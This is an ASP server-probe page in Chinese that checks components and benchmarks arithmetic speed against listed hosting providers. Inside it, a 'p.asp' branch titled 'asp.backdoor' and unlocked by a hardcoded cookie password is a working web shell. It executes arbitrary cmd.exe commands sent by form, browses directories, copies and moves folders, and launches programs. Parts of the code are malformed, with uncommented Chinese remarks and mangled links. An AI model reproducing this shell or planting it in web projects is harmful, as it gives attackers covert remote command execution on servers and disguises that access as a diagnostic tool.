<br> <font class=fonts>其他组件支持情况检测</font><br> 在下面的输入框中输入你要检测的组件的ProgId或ClassId。 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <FORM action=<%=rseb%>?q=test.asp method=post id=form1 name=form1> <tr height="18" class=backq> <td align=center height=30><input class=input type=text value="" name="classname" size=40> <INPUT type=submit value=" 确 定 " class=backc id=submit1 name=submit1> <INPUT type=reset value=" 重 填 " class=backc id=reset1 name=reset1> </td> </tr> </FORM> </table> <br> <font class=fonts>ASP脚本解释和运算速度测试</font><br> <%
感谢网际同学录 <a href= http://www.5719.net target=_blank http://www.5719.net</a> 推荐使用timer函数 因为只进行50万次计算,所以去掉了是否检测的选项而直接检测
Response.Write "整数运算测试,正在进行50万次加法运算..." dim t1,t2,lsabc,thetime,thetime2 t1=timer for i=1 to 500000 lsabc= 1 + 1 next t2=timer thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10) Response.Write "...已完成!<font color=red>" & thetime & "毫秒</font>。<br>"
Response.Write "浮点运算测试,正在进行20万次开方运算..." t1=timer for i=1 to 200000 lsabc= 2^0.5 next t2=timer thetime2=cstr(int(( (t2-t1)*10000 )+0.5)/10) Response.Write "...已完成!<font color=red>" & thetime2 & "毫秒</font>。<br>" %> <table class=backq border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <tr height=18 align=center> <td width=320 rowspan=2>供 对 照 的 服 务 器</td> <td width=130 colspan=2>完成时间(毫秒)</td> </tr> <tr height=18 align=center> <td width=65>整数运算</td><td width=65>浮点运算</td> </tr> <tr height=18> <td align=left> <a href="<a href= http://www.ajiang.net target=_blank http://www.ajiang.net</a>">阿江的个人主机(DDR512M赛扬1.7G,测1次)</a></td><td> 250</td><td> 234</td> </tr> <tr height=18> <td align=left> <a href="<a href= http://www.100u.com?come=aspcheck&keyword= target=_blank http://www.100u.com?come=aspcheck&keyword=</a>虚拟主机" target="_blank">百优科技100u主机(2003-06-12,测10次,最大值)</a></td><td> 187</td><td> 156</td> </tr> <tr height=18> <td align=left> <a href="<a href= http://www.west263.com/index.asp?ads=ajiang target=_blank http://www.west263.com/index.asp?ads=ajiang</a>"> 西部数码west263主机(2003-06-12,测10次,最大值)</a></td><td> 187</td><td> 177</td> </tr> <tr height=18> <td align=left> <a href="<a href= http://www.linkwww.com target=_blank http://www.linkwww.com</a> ">联网科技linkwww主机(2003-06-13,测10次,最大值)</a></td><td> 187</td><td> 171</td> </tr> <tr height=18> <td align=left> <font color=red>您正在使用的这台服务器</font> </td><td> <font color=red><%=thetime%></font></td><td> <font color=red><%=thetime2%></font></td> </tr> </table> </BODY> </HTML>
<%case "p.asp"%> <%if Request.Cookies("password")="7758521" then %> <%response.write "<font class=fonts>注意:每次只能执行一个操作</font>" %> 当前时间:<%response.write now()%><BR>程序所在的物理路径: <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> <html> <title>asp.backdoor </title> <style> <!-- table{ font-family: 宋体; font-size: 9pt }
.input { BORDER: #111111 1px solid; FONT-SIZE: 9pt; BACKGROUND-color: #F8FFF0 } .backs { BACKGROUND-COLOR: #3F8805; COLOR: #ffffff;
} .backq { BACKGROUND-COLOR: #EEFEE0 } .backc { BACKGROUND-COLOR: #3F8805; BORDER: medium none; COLOR: #ffffff; HEIGHT: 18px; font-size: 9pt } .fonts { COLOR: #3F8805 } --> </STYLE> <body bgcolor="#C0C0C0" text="#000000"> <table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder"><tr bgcolor="#EEEEEE" height=18 class="noborder" style=table-layout:fixed; word-break:break-all><td align=left> <form action="<%= Request.ServerVariables("URL") %>?q=p.asp" method="post"> <input type=text name=text value="<%=DSnXA %>"> <font class=fonts>输入要浏览的目录,最后要加\</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> <input type=text name=text1 value="<%=DSnXA1 %>"> copy <input type=text name=text2 value="<%=DSnXA2 %>"> <font class=fonts>目的地址不要带文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> <input type=text name=text3 value="<%=DSnXA3 %>"> move <input type=text name=text4 value="<%=DSnXA4 %>"><font class=fonts> 目的地址不要带文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> 路径:<input type=text name=text5 value="<%=DSnXA5 %>" > 程序:<input type=text name=text6 value="<%=DSnXA6 %>" ><font class=fonts> 不可以加参数</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type="text" name="ok" size=55><font class=fonts> CMD命令对话框</font> </td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type=text name=pathlcx size=55><font class=fonts> 路径与文件名</font></td><tr/> <tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> <textarea cols=80 rows=5 name=textlcx > <object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <% ok=Request("ok") if ok<>"" then response.write oScript.exec ("cmd.exe /c "& ok).stdout.readall %></textarea> <input type=submit name=sb value=命令 class=input> </form></td></tr> </table> </center> <% Response.Write request.form("cmd") & "<br><br>" Response.Write strResult DSnXA = Request.Form("text") 目录浏览 if (DSnXA <> "") then set shell=server.createobject("shell.application") 建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>" next end if DSnXA1 = Request.Form("text1") 目录拷贝,不能进行文件拷贝 DSnXA2 = Request.Form("text2") if DSnXA1<>"" and DSnXA2<>"" then set shell1=server.createobject("shell.application") 建立shell对象 set fod1=shell1.namespace(DSnXA2) for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)="\" then path=left(DSnXA1,i-1) exit for end if next if len(path)=2 then path=path & "\" path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write "command completed success!" end if DSnXA3 = Request.Form("text3") 目录移动 DSnXA4 = Request.Form("text4") if DSnXA3<>"" and DSnXA4<>"" then set shell2=server.createobject("shell.application") 建立shell对象 set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)="\" then path=left(DSnXA3,i-1) exit for end if next
if len(path)=2 then path=path & "\" path2=right(DSnXA3,len(DSnXA3)-i) set fod2=shell2.namespace(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write "command completed success!" end if DSnXA5 = Request.Form("text5") 执行程序要指定路径 DSnXA6 = Request.Form("text6") if DSnXA5<>"" and DSnXA6<>"" then set shell3=server.createobject("shell.application") 建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write "command completed success!" end if end if %> </body> <% end select function Epass(pass) temppass=StrReverse(left(pass&"zxcvbnm,./",10)) templen=len(pass) mmpassword="" for j=1 to 10 mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1)) next Epass=replace(mmpassword,"","B") end function %>